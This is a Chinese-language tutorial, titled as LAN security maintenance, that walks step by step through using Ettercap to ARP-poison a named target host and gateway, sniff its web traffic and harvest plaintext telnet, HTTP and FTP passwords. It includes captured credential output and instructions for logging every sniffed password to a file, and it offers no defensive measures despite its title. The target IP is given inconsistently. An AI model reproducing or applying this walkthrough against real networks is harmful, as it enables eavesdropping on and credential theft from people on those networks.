为局域网提供更安全的保护－安全维护(4)

【运行环境】

Windows XP安装虚拟机

Linux系统（这里选择CentOS）

Ettercap软件（下载地址：http://www.sans.org.cn/Soft/301.html ）

【跟我操作】

1.软件安装

解压完之后就是编译：./configure

make

2、假设我们的目标主机是：210.197.248.192先判断它操作系统

现在看看对方正在做什么：

[root@bolon ~]# ettercap -Nza 218.197.248.192 218.197.248.254

MAC1 MAC2

这里218.197.248.254是网关。这样，我们就是中间人了，它与外网所有数据都会在我们这里流过。不过被嗅探机器的内网数据交换我们将看不到.下面是截取到的2段典型的HTTP交互数据，从第一段可以看出客户正在看的网页，脚本，浏览器语言以及客户的操作系统等信息。从第2段可以看出主机的bannner等等,都是网站的基本资料

GET /pcedu/script/title_edu.js HTTP/1.1.

Accept: */*.

Referer: http://wwwb.pconline.com.cn/pcedu/soft/doc/nt/10308.htm.

Accept-Language: zh-cn.

Accept-Encoding: gzip, deflate.

If-Modified-Since: Mon, 09 Sep 2002 09:18:53 GMT.

If-None-Match: "6f67c-2d5-3d7c677d".

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt).

Host: wwwb.pconline.com.cn.

Connection: Keep-Alive.

HTTP/1.1 200 OK.

Date: Sat, 01 Mar 2003 08:25:37 GMT.

Server: Apache/1.3.20 (Unix) PHP/4.1.2 mod_ssl/2.8.4 OpenSSL/0.9.6a.

X-Powered-By: PHP/4.1.2.

Keep-Alive: timeout=15, max=100.

Connection: Keep-Alive.

Transfer-Encoding: chunked.

Content-Type: text/html.

当然，它还可以记下很多网页内容，全是HTML源代码，你可以抓下来，用HTM后缀保存，再用浏览器打开，好了，你看到的是什么，别人看到的就是什么。不过它对中文支持不很好，所以别人看见的中文你将无法看到，另一个程序LCRZOEX就很不错，在中文终端里，可以把所有中文网页完整抓下来。一般黑客最感兴趣的无非是密码了，比如下面的组合，h是帮助，它会提供帮助信息

[root@bolon root]# ettercap -NCzs

ettercap 0.6.0 (c) 2001 ALoR & NaGA

Your IP: 218.197.248.226 with MAC: 00:00:E8:7B:CA:4E on Iface: eth0

Resolving 1 hostnames...

Press 'h' for help...

Sniffing (IP based): ANY:0 ANY:0

TCP packets only... (default)

Collecting passwords...

[qq] - quit

[lL] - log all trafic to file(s)

space - stop/cont sniffing

15:52:51 218.197.248.21:1027 61.114.4.41:23 telnet

USER: root

PASS: root

15:54:53 218.197.248.46:1041 61.135.132.99:80 http

USER:dalin

PASS:7895865

http://www.sohu.com/

16:13:14 218.197.248.192:2278 218.197.249.172:21 ftp

USER: CshjPASS: 123456

如果你输入lL,系统在/ROOT下会自动生成“20030301-Collected-passwords.log",里面会记录下所有能嗅探到的密码，看来TELNET，HTTP，FTP密码都不能逃过他的法眼。

【总结】

Ettercap主要用于网络的的数据嗅探、按照规则对数据拦截、对日志进行分析。它能够支持多种协议，而且还支持ssh和https这样加密过的数据，和sniffer具有部分相同的功能，如有用数据的捕获与分析，只不过实现的原理和步骤有所差异。